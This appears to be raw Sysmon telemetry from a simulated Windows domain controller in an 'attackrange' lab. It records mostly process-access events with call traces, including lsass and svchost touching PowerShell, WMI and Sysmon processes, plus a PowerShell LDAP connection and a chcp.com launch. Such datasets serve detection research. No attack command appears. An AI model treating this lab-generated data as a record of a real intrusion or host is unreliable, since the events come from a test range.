10:40:54.419{733EE690-3DF9-5F80-1000-000000007F01}11322084C:\Windows\system32\svchost.exe{733EE690-3E36-5F80-8500-000000007F01}4404C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+64ed5|C:\Windows\SYSTEM32\ntdll.dll+64bdd|C:\Windows\SYSTEM32\ntdll.dll+64a40|C:\Windows\SYSTEM32\ntdll.dll+45b70|C:\Windows\SYSTEM32\ntdll.dll+2a073|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.419{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.325{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.325{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.325{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DFD-5F80-2200-000000007F01}2824C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.014{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.014{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:54.014{733EE690-3DF7-5F80-0B00-000000007F01}868908C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:55.136{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1fb7a|C:\Windows\SYSTEM32\samsrv.dll+5df1|C:\Windows\SYSTEM32\samsrv.dll+5cf2|C:\Windows\SYSTEM32\samsrv.dll+178ce|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 354300x80000000000000002837Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:55.175{733EE690-3E35-5F80-8300-000000007F01}4284C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-7216619.attackrange.local61378-false10.0.1.14win-dc-7216619.attackrange.local389ldap 10341000x80000000000000002934Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3E39-5F80-8B00-000000007F01}47484656C:\Windows\system32\conhost.exe{733EE690-3E39-5F80-8F00-000000007F01}5000C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002933Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002932Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002931Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002930Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002929Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002928Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002927Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E39-5F80-8F00-000000007F01}5000C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.864{733EE690-3E39-5F80-8E00-000000007F01}48285036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{733EE690-3E39-5F80-8F00-000000007F01}5000C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6bef32a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b393e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6be45466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b354997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3b2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3964cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3964cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b39635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b3882e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b394130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b393e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6be45466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b37ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+6b37a232(wow64) 154100x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:57.868{733EE690-3E39-5F80-8F00-000000007F01}5000C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 